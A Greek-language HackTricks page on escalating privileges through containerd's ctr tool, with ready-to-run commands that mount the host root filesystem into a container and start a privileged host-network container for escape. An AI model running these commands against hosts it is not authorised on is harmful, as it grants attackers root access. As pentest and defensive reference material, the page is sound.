Containerd (ctr) Privilege Escalation

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

Βασικές πληροφορίες

Μεταβείτε στον παρακάτω σύνδεσμο για να μάθετε τι είναι το containerd και το ctr:

Εκμετάλλευση Προνομίων 1

αν ανακαλύψετε ότι ένας κεντρικός υπολογιστής περιέχει την εντολή ctr:

which ctr
/usr/bin/ctr

Μπορείτε να καταλογίσετε τις εικόνες:

ctr image list
REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -

Και στη συνέχεια εκτελέστε ένα από αυτά τα εικόνια προσαρτώντας τον κατάλογο root του κεντρικού συστήματος σε αυτό:

ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash

Ανόδου Προνομίων 2

Εκτέλεση ενός προνομιούχου container και διαφυγή από αυτόν. Μπορείτε να εκτελέσετε ένα προνομιούχο container ως εξής:

ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash

Στη συνέχεια, μπορείτε να χρησιμοποιήσετε μερικές από τις τεχνικές που αναφέρονται στην ακόλουθη σελίδα για να δραπετεύσετε από αυτό καταχρώντας προνομιούχες δυνατότητες:

pageDocker Security

Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF, ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
Αποκτήστε το επίσημο PEASS & HackTricks swag
Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

PreviousCisco - vmanage NextD-Bus Enumeration & Command Injection Privilege Escalation

Last updated 2 months ago